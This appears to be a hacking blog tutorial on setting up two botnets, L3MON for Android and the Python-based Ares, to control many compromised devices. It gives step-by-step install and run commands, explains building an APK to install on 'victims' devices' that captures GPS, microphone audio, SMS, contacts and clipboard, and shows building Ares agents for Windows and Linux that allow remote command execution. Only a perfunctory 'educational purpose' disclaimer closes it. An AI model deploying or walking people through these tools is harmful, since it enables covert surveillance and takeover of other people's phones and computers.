INTRO
Have you read my previous article. I have described the method to host a Webshell. It was an advance method to hack any Windows, Andriod or any Linux computer. But It is not enough for a Hacker. An advance hacker always wants more devices to be control of.
In this article, you will see how can we manage a lot of hacked device via Bonet. we are going to discuss some advance hacking techniques here. For this article, I am going to use two not very famous but very useful botnets.
What Is BOTNET
A botnet is a number of Internet-connected devices, each of which is running one or more bots. Botnets can be used to perform Distributed Denial-of-Service attacks, steal data, send spam, and allows the attacker to access the device and its connection. ReadMore
ATTACK
Both of the botnets are very powerful and has its own speciality. But they have a similarity that both of these run with a web interface which can be very useful for the user while working with a lot of devices.
# 1. L3MON
It is the best botnet for Andriod devices. or you can say that it only works with android devices. It has no feature for a PC operating system. But its features make it the best botnet to work with the Andriod.
Features:
- GPS Logging
- Microphone Recording
- View Contacts
- SMS Logs
- Send SMS
- Call Logs
- View Installed Apps
- View Stub Permissions
- Live Clipboard Logging
- Live Notification Logging
- View WiFi Networks (logs previously seen)
- File Explorer & Downloader
- Command Queuing
- Built-In APK Builder
Installation
Installation of this tool can be a little complicated for some users. That’s why I am writing my own installation method but if you are an advance Hacker then it is possible that you may install it by their documentation.
∗first, install JRE8:
apt-get install openjdk-8-jre
∗Install NodeJs:
curl -sL https://deb.nodesource.com/setup_14.x | bash -
apt-get install -y nodejs
∗Then we are going to install npm:
curl -L https://npmjs.org/install.sh | sudo sh
∗Now we need to download the L3mon from GitHub. but we are going to pick a release:
https://github.com/D3VL/L3MON/releases/download/1.1.0/L3MON-v1.1.0.zip
∗extract the file on Desktop. open this path in the terminal and run this command:
npm install
∗now we need to change the username and password. you can choose any username. But the password would be in md5 hash encrypted. You can change your username and password via maindb.json file.
Screenshot:
∗To run the web panel of L3mon:
pm2 start index.js
∗Now you can go to the http://127.0.0.1:22533 to get the web-panel and login with your creds.
If You have done everything well, you might be able to see this panel:
Screenshot:
∗To run L3mon at startup(not necessary):
pm2 startup
There is an APK builder will generate an apk file that needs to be installed in the victims’ devices. and once you will install this APK with permissions, there will be a host in the Devices tab.
And I am sorry that I won’t be able to show you the working of this botnet. because I am using an older version of Kali Linux in which the occurring of some errors is very common. it is possible that you may face some error if you are running the older version of Kali Linux.
#2. Ares
As I mentioned before that both of these tools are unique in itself. well, Ares is a tool made up in Python. Ares can work with any OS(except Andriod). But this tool doesn’t give us any features. all we have is a command execution in the PC. But it can be useful sometimes. where you have to manage two or more than two devices at one place.
Installation
Download this from the GitHub:
git clone https://github.com/sweetsoftware/Ares.git
go to the downloaded folder and compile the windows agents on Linux(not necessary):
./wine_setup.sh
and that’s it. now have it installed. isn’t it so easy installation than the installation of L3mon, we did up there.
RUN
First of all, we will run the server so any client who is continuously sending a request to our may able to connect. To run the server, go to the server directory and this command in terminal:
./ares.py runserver
After running this command, we will go to the http://127.0.0.1:5000 to visit the web-panel of this website.
It will ask you for a new password/passphrase. once you will provide it passphrase, it will look like this:
Screenshot:
now, we have no agents. To make a new agent, we will run this command in agent dir:
./agent.py
and you must have an agent in your web-panel. if it doesn’t show you anything, you can refresh your webpage.
Screenshot:
You can even build your own binary agent for Linux or Windows:
./builder.py -p Linux --server http://localhost:8080 -o agentIf you want it to build for Windows then you can change the Linux with Windows. this process can take some time to build an agent.
I believe that it can run from android but I have ever tried it. you can user termux to run agent.py in your Andriod device and please tell me if it works.
Warning: Don’t try these methods with public IP. it can cost you Jali. Try this only on localhost . it is only for EDucational purpose!!!!!!!!
Stay home, stay safe and keep reading our articles.
Thanks For Visiting
